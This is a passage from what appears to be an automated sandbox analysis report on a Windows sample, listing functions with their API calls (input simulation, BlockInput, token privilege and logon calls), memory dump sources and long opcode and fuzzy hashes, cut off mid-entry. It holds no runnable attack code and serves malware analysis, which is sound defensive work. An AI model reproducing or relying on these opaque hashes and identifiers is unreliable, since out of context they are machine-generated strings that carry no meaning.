                                                                                                                        • Instruction Fuzzy Hash: E2F01D76A05209BFDF04DFE5DD89AEEBBBDEF08301F10446AA602F2191E3709A449B10
                                                                                                                        Function 00E6DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(00E5C848,00E5C848), ref: 00E6DDA2
                                                                                                                        • FindFirstFileW.KERNEL32(00E5C848,?), ref: 00EC4A83
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4185537391-0
                                                                                                                        • Opcode ID: 088f5b8be202f973e57444a54e82956ec98cf9cb2318326e2d262677a36b0ce1
                                                                                                                        • Instruction ID: c1de47fb53ea6924941b4e073dce94937ab4f98386889a387952ff6adaf98170
                                                                                                                        • Opcode Fuzzy Hash: 088f5b8be202f973e57444a54e82956ec98cf9cb2318326e2d262677a36b0ce1
                                                                                                                        • Instruction Fuzzy Hash: 7DE0D87285A4115B42146738FC0D8E9379CDB0533CB50070AF835E10E0F7709D4585D6
                                                                                                                        Function 00E9FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9FD71
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E9FDA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: b31f19347420ab6252ec01cc679de1e333e99ac937697363358806f4bccd0a87
                                                                                                                        • Instruction ID: d5a08bae9ad7d2a1790c3fd03e257957cef14019dc8e01bc3306e2287eb8898f
                                                                                                                        • Opcode Fuzzy Hash: b31f19347420ab6252ec01cc679de1e333e99ac937697363358806f4bccd0a87
                                                                                                                        • Instruction Fuzzy Hash: DF11C4326146009FDB10DF29DC45A2AB7E8FF84324F00851EF9A9E7291DB30EC058B81
                                                                                                                        Function 00E9D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EAC2E2,?,?,00000000,?), ref: 00E9D73F
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EAC2E2,?,?,00000000,?), ref: 00E9D751
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 6c1b75de8e097f0bfef6eea7cb85056b38a9f7d58c3a3e1a251b1ecb46eaf6a5
                                                                                                                        • Instruction ID: caae4d5225508ea3150b2bb0efb3848fd369b8f68b4edb1d37db922168310f19
                                                                                                                        • Opcode Fuzzy Hash: 6c1b75de8e097f0bfef6eea7cb85056b38a9f7d58c3a3e1a251b1ecb46eaf6a5
                                                                                                                        • Instruction Fuzzy Hash: 1CF0823510532DABDB11AFA4DC49FEA77ADEF49351F008116B909E6191D6309944DBA0
                                                                                                                        Function 00E94B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E94B89
                                                                                                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00E94B9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        • Opcode ID: e7d25ec6ff27216fefa33e021ca2d32446c71632d6e59332f87326f6f43ecc42
                                                                                                                        • Instruction ID: 5d73d7324e783941b31c989a70c1c7d85a4155ce500d15f8c8662eaeef33f4e3
                                                                                                                        • Opcode Fuzzy Hash: e7d25ec6ff27216fefa33e021ca2d32446c71632d6e59332f87326f6f43ecc42
                                                                                                                        • Instruction Fuzzy Hash: 92F01D7090424DAFDF058FA5DC05BBE7BB4EF04309F04840AF955A51D1D779C6169F94
                                                                                                                        Function 00E8B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E8B9EC), ref: 00E8B8C5
                                                                                                                        • CloseHandle.KERNEL32(?,?,00E8B9EC), ref: 00E8B8D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: d79d1a3aea8ab1e3cae19157c0a4d07b0bfe6413bd81877d06d24ac754f74180
                                                                                                                        • Instruction ID: 7680aa68fabe283ca03d8ce9a77483b3f4a8d91b2b556a784dab7598368f3e1c
                                                                                                                        • Opcode Fuzzy Hash: d79d1a3aea8ab1e3cae19157c0a4d07b0bfe6413bd81877d06d24ac754f74180
                                                                                                                        • Instruction Fuzzy Hash: CDE0B672015611EEE7262B61FC09D767BEAEF04315B14D82AF49A91470DB72AC94DB10
                                                                                                                        Function 00E78E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00E5125D,00E77A43,00E50F35,?,?,00000001), ref: 00E78E41
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E78E4A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 5f0c92a8d39deb20a580bd32419f48b98562412871fbb490949ede95b8edb170
                                                                                                                        • Instruction ID: 0022265a3f747419ce43938d9eae38965f53bf7af104f568fffde9995e3c583a
                                                                                                                        • Opcode Fuzzy Hash: 5f0c92a8d39deb20a580bd32419f48b98562412871fbb490949ede95b8edb170
                                                                                                                        • Instruction Fuzzy Hash: B2B09271049A08BFEA002BA6FC09B883F68EB08A73F004012F61D540608B6354548A92
                                                                                                                        Function 00E63680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3964851224-0
                                                                                                                        • Opcode ID: dff48726add96bb461c72dcedd1c8a8df29f7316cb76bd106b343f01bdeccae6
                                                                                                                        • Instruction ID: 4b94e5e376aca583d68bd257e14c9eac20fb4f5a4866ab912ce00bc33f24c64d
                                                                                                                        • Opcode Fuzzy Hash: dff48726add96bb461c72dcedd1c8a8df29f7316cb76bd106b343f01bdeccae6
                                                                                                                        • Instruction Fuzzy Hash: 11928D70608341CFD724DF28D580B6AB7E0BF84348F18A85DE99AAB392D771ED45CB52
                                                                                                                        Function 00E8113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b1e66f3f55eab4285f734a6edd42b6816dd3cc4ddc6644174d95906920313568
                                                                                                                        • Instruction ID: 36435f8aa5db5c748a6011e1e64d3b6966cee845376637538a1c67cda0a22d51
                                                                                                                        • Opcode Fuzzy Hash: b1e66f3f55eab4285f734a6edd42b6816dd3cc4ddc6644174d95906920313568
                                                                                                                        • Instruction Fuzzy Hash: D7B10621D2AF844DD72396398871336B75CAFBB2C9F91D71BFC1A74D62EB2185874280
                                                                                                                        Function 00E9BFB8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __time64.LIBCMT ref: 00E9BFCB
                                                                                                                          • Part of subcall function 00E740DA: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E9C6AF,00000000,?,?,?,?,00E9C85C,00000000,?), ref: 00E740E3
                                                                                                                          • Part of subcall function 00E740DA: __aulldiv.LIBCMT ref: 00E74103
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2893107130-0
                                                                                                                        • Opcode ID: b9367f87c36571403cd35278e39dfe33ebdab4d2636e3c73a75420cffd810290
                                                                                                                        • Instruction ID: 3b40d689c659b220adb666dede26fa33c8c1d87025c291e932a3d0a45f98bed2
                                                                                                                        • Opcode Fuzzy Hash: b9367f87c36571403cd35278e39dfe33ebdab4d2636e3c73a75420cffd810290
                                                                                                                        • Instruction Fuzzy Hash: 7B21B472634510CBCB29CF28D881A92B7E5EB99310B248E7DE0E5CB2C0CB74B905DB54
                                                                                                                        Function 00EA703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 00EA7057
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: eca42e3ef2d62c827766546b25ea345bb604b1262834841d64042ae846122fef
                                                                                                                        • Instruction ID: 62a38d609921fddc25ae5e5fea995156b6acf21571c31ad9979f52b24fa2a006
                                                                                                                        • Opcode Fuzzy Hash: eca42e3ef2d62c827766546b25ea345bb604b1262834841d64042ae846122fef
                                                                                                                        • Instruction Fuzzy Hash: AEE012352142045FC710DB69D844996B7ECEF59750F01D42BAA45E7251DAB1E8048B90
                                                                                                                        Function 00E97DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00E97DF8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: mouse_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2434400541-0
                                                                                                                        • Opcode ID: c803d47a29d9153083758ea0d27fbd4d7f0740929763a29f1805ba1f9decbd9a
                                                                                                                        • Instruction ID: badb398a64f5f12b690718cbed5a5efd34167047fdc2870b3c97812158ed7d65
                                                                                                                        • Opcode Fuzzy Hash: c803d47a29d9153083758ea0d27fbd4d7f0740929763a29f1805ba1f9decbd9a
                                                                                                                        • Instruction Fuzzy Hash: 1AD09EA517C606B9FD190720AC2FF7A1248EF43BC9FA4764AB182F60C1EC90684C9435
                                                                                                                        Function 00E8BE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E8BA6A), ref: 00E8BEB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LogonUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1244722697-0
                                                                                                                        • Opcode ID: b21598c111cda6675a33a1652ae4ff6a8fbacb209753c38eb3d44093a3efba38
                                                                                                                        • Instruction ID: 521463d0724cf82a7c7106e9b6df62229eab8be8bf4845684517cadc0a82e904
                                                                                                                        • Opcode Fuzzy Hash: b21598c111cda6675a33a1652ae4ff6a8fbacb209753c38eb3d44093a3efba38
                                                                                                                        • Instruction Fuzzy Hash: EED05E320A460EAFDF024FA4EC02EAE3F6AEB04700F408111FA11D50A0C671D531AB50
                                                                                                                        Function 00ECC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        • Opcode ID: 140a417c6ef41e37deabb5de021bdd610552e9d11b050958158a26046fe6c578
                                                                                                                        • Instruction ID: e2df67b8b62dbcb1721bdd9805d4a5b73bbb9000ad7a3aebaa3a531a1989d5a2
                                                                                                                        • Opcode Fuzzy Hash: 140a417c6ef41e37deabb5de021bdd610552e9d11b050958158a26046fe6c578
                                                                                                                        • Instruction Fuzzy Hash: 5EC04CB140500DDFC715CB80DD45EEFB7BCBB04300F104096A155F1040D7719B459B71
                                                                                                                        Function 00E78E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E78E1F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: c8e3593b40e5dd2dfe91f60fa49f70f22e0d20df2c445f5179e69beb0ddf5a1d
                                                                                                                        • Instruction ID: 632428a7debbb085be761a29a2e44f1e82be43eb40bd7fcac0d4a9f5ea90cd57
                                                                                                                        • Opcode Fuzzy Hash: c8e3593b40e5dd2dfe91f60fa49f70f22e0d20df2c445f5179e69beb0ddf5a1d
                                                                                                                        • Instruction Fuzzy Hash: 25A0243000450CFFCF001F57FC044447F5CD7041707004011F40C00031C733541045C1
                                                                                                                        Function 00E7A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00E76AE9,00F067D8,00000014), ref: 00E7A937
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: ee369c5ea00180837eb1810ffae8e90f768fb95b94c9bad379ae954adaa85ef0
                                                                                                                        • Instruction ID: d7289c885d97d2d6959806442ff17f8c9bd385f3aff81cd3e4bd09a026cf3e8a
                                                                                                                        • Opcode Fuzzy Hash: ee369c5ea00180837eb1810ffae8e90f768fb95b94c9bad379ae954adaa85ef0
                                                                                                                        • Instruction Fuzzy Hash: 03B012B43031024FD7084B39BC6415A3AD4D749101342803E7003C6661DF308450EF00
                                                                                                                        Function 00E70EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction ID: afbc48bb01d9ff57bd5817de47394a4f8438014de62b0bc39d411d89918bf3d7
                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                        • Instruction Fuzzy Hash: EDC1E6722052D389DF2EC63DC43043EFAA15AA27B931AA79DD4BBDF4D0EE24C564D610
                                                                                                                        Function 00E712F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
